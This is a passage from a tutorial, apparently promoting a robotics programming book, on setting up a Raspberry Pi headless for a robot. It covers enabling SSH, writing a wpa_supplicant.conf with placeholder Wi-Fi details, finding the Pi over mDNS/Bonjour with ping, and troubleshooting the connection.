expect your robot to function autonomously, so you would only connect to the Pi to modify things or test code. As an alternative to bringing a laptop to control a robot everywhere, it can be more convenient to add a few indicator LEDs so you can start and stop autonomous behaviors, view the robot's status, or just drive it without needing to hook up the laptop at all. This Raspberry Pi is free from the screen and keyboard. Most of the time, a screen and keyboard are not required. However, it is worth having them around for the few cases in which you lose contact with the Raspberry Pi and it refuses to respond via the network. You can then use a screen and keyboard to connect with it and see what is going on. For our headless access to the Raspberry Pi, we will be using the SSH system, a secure shell. SSH gives you a command line to send instructions to the Pi and a file transfer system to put files onto it. As SSH connects over a network, we need to configure our Raspberry Pi to connect to your own wireless network. Making a Pi headless makes it free to roam around. It keeps a robot light by not needing to carry or power a screen and keyboard. Being headless makes a robot smaller since a screen and keyboard are bulkier. It also encourages you, the maker, to think more about autonomous behavior since you can't always type commands to the robot. Setting up wireless on the Raspberry Pi and enabling SSH To make your Raspberry Pi headless, we need to set up Wi-Fi. First, you will need to insert a MicroSD card prepared using Raspbian into your computer. To prepare your MicroSD card (at least 16GB) follow these steps: Go to https://www.raspberrypi.org/software/operating-systems/ and download the ZIP file of Raspbian Lite. Download Etcher and install it. Connect your MicroSD to your computer and select the downloaded Raspbian Lite file. The flash button will be highlighted, press it and the process should be completed in a few minutes. If you are continuing straight here from Etcher, you should remove the card and reinsert it so that the computer can recognize the new state of the drive. You will see the card shows up as two disk drives. One of the drives is called boot; this is the only one that you can read in Windows. Windows will ask if you want to format one of these disks. Click Cancel when Windows asks you. This is because part of the SD card holds a Linux-specific filesystem that is not readable by Windows. In boot, you'll need to create two files: ssh: Create this as an empty file with no extension wpa_supplicant.conf: This file will contain your Wi-Fi network configuration It is important that the SSH file has no extension, so it is not ssh.txt or some other variation. Windows will hide extensions by default so you may need to reveal them. On Windows, in File Explorer, go to the View tab, look for the Show/Hide pane, and then tick File name extensions. In general, when working with code, having the extensions displayed is important so I recommend leaving this option ticked. The wpa_supplicant.conf file The first line you must provide in the wpa_supplicant.conf file is a country code. These are known as iso/iec alpha2 country codes and you should find the appropriate country code for the country you are in, by going to https://datahub.io/core/country-list. This is important, as the Wi-Fi adapter will be disabled by Raspbian if this is not present, to prevent it from operating outside the country's legal standard, and interfering or being interfered with by other equipment. In my case, I am in Great Britain, so my country code is GB. Let's take a look at the code: country=GB Then, add the following lines. update_config means that other tools used later are allowed to update the configuration: update_config=1 ctrl_interface=/var/run/wpa_supplicant Now, you can define the Wi-Fi network your robot and Raspberry Pi will connect to: network={ ssid="<your network ssid>" psk="<your network psk>" } Please be sure to specify your own network details instead of the placeholders here. The pre-shared key (PSK) is also known as the Wi-Fi password. These should be the same details you use to connect your laptop or computer to your Wi-Fi network. The completed wpa_supplicant.conf file should look like this: country=GB update_config=1 ctrl_interface=/var/run/wpa_supplicant network={ ssid="<your network ssid>" psk="<your network psk>" } Ensure you use the menus to eject the MicroSD card so the files are fully written before removing it. Now, with these two files in place, you can use the MicroSD Card to boot the Raspberry Pi. Plug the MicroSD card into the slot on the underside of the Raspberry Pi. The contacts of the MicroSD card should be facing the Raspberry Pi in the slot; it will only fit properly into the slot in the correct orientation. Plug a Micro-USB cable into the side of the Raspberry Pi and connect it to a power supply. As the technical requirements suggested, you should have a power supply able to provide around 2.1 amps. Lights turning on means that it is starting. Finding your Pi on the network Assuming your SSID and PSK are correct, your Raspberry Pi will now have registered on your Wi-Fi network. However, now you need to find it. The Raspberry Pi will use dynamic addresses (DHCP), so every time you connect it to your network, it may get a different address; linking to your router and writing down the IP address can work in the short term, but doing that every time it changes would be quite frustrating. Luckily, the Raspberry Pi uses a technology known as mDNS to tell nearby computers that it is there. mDNS is the Multicast Domain Name System, which just means that the Raspberry Pi sends messages to all nearby computers, if they are listening, to say that its name is raspberrypi.local and giving the address to find it. This is also known as Zeroconf and Bonjour. So, the first thing you'll need to do is ensure your computer is able to receive this. Apple macOS If you are using an Apple Mac computer, it is already running the Bonjour software, which is already mDNS capable. Microsoft Windows On Windows, you will need the Bonjour software. If you have already installed a recent version of Skype or iTunes, you will already have this software. You can use this guide (https://smallbusiness.chron.com/enable-bonjour-65245.html) to check that it is already present and enable it. You can check whether it is already working with the following command in a Command Window: C:\Users\danny>ping raspberrypi.local If you see this, you have Bonjour already: PING raspberrypi.local (192.168.0.53) 56(84) bytes of data. 64 bytes from 192.168.0.53 (192.168.0.53): icmp_seq=1 ttl=64 time=0.113 ms 64 bytes from 192.168.0.53 (192.168.0.53): icmp_seq=2 ttl=64 time=0.079 ms If you see this, you'll need to install it: Ping request could not find host raspberrypi.local. Please check the name and try again. To do so, browse to the Apple Bonjour For Windows site at https://support.apple.com/downloads/bonjour_for_windows and download it, then install Download Bonjour Print Services for Windows. Once this has run, Windows will now be able to ask for mDNS devices by name. Linux Ubuntu and Fedora desktop versions have had mDNS compatibility for a long time. On other Linux desktops, you will need to find their instructions for Zeroconf or Avahi. Many recent ones have this enabled by default. Testing the setup The Raspberry Pi's green light should have stopped blinking and only a red power light should be visible. In Windows, summon a command line by pressing the Windows key and then CMD. In Linux or macOS, summon a Terminal. From this Terminal, we will try to ping the Raspberry Pi, that is, find the Pi on the network and send a small message to elicit a response: ping raspberrypi.local If everything has gone right, the computer will show that it has connected to the Pi: $ ping raspberrypi.local PING raspberrypi.local (192.168.0.53) 56(84) bytes of data. 64 bytes from 192.168.0.53 (192.168.0.53): icmp_seq=1 ttl=64 time=0.113 ms 64 bytes from 192.168.0.53 (192.168.0.53): icmp_seq=2 ttl=64 time=0.079 ms 64 bytes from 192.168.0.53 (192.168.0.53): icmp_seq=3 ttl=64 time=0.060 ms 64 bytes from 192.168.0.53 (192.168.0.53): icmp_seq=4 ttl=64 time=0.047 ms What if you cannot reach the Raspberry Pi? If the Raspberry Pi does not appear to be responding to the ping operation, these are some initial steps you can take to try to diagnose and remedy the situation. If it works already, skip to the next heading. Refer to the following steps: First, double-check your connections. You should have seen a few blinks of green light and a persistent red light. If not, ensure that the SD card is seated firmly and that the power supply can give 2.1 amps. Use your Wi-Fi access point settings with the Pi booted and see if it has taken an IP address there. This may mean that Zeroconf/Bonjour is not running on your computer correctly. If you have not installed it, please go back and do so. If you have and you are on Windows, the different versions of Bonjour print services, Bonjour from Skype, and Bonjour from iTunes can conflict if installed together. Use the Windows add/remove functions to see if there is more than one and remove all Bonjour instances, then install the official one again. Next, turn the power off, take out the SD card, place this back into your computer, and double check that the wpa_supplicant.conf file is present and has the right Wi-Fi details and country code. The most common errors in this file are the following: Incorrect Wi-Fi details Missing quotes or missing or incorrect punctuation Incorrect or missing country code Parts being in the wrong case The SSH file is removed when the Pi boots, so if you are certain it was there and has been removed, this a good sign that the Pi actually booted. Finally, this is where you may need to boot the Pi with a screen and keyboard connected, and attempt to diagnose the issue. The screen will tell you whether there are other issues with wpa_supplicant.conf or other problems. With these problems, it is important to look at the screen text and use this to search the web for answers. I cannot reproduce all those here, as there are many kinds of problems that could occur here. If you cannot find this, I recommend asking on Twitter using the tag #raspberrypi, on Stack Overflow, or in the Raspberry Pi Forums at https://www.raspberrypi.org/forums/. In this article, we explored what headless or wireless means for robots and set up the 'headless' in Raspberry Pi. To learn more about robotics and connecting, configuring the robot check out the book, Learn Robotics Programming. Introducing Strato Pi: An industrial Raspberry Pi Raspberry Pi launches it last board for the foreseeable future: the Raspberry Pi 3 Model A+ available now at $25 Introducing Raspberry Pi TV HAT, a new addon that lets you stream live TV
Read more
  • 0
  • 0
  • 35979
Modal Close icon
Modal Close icon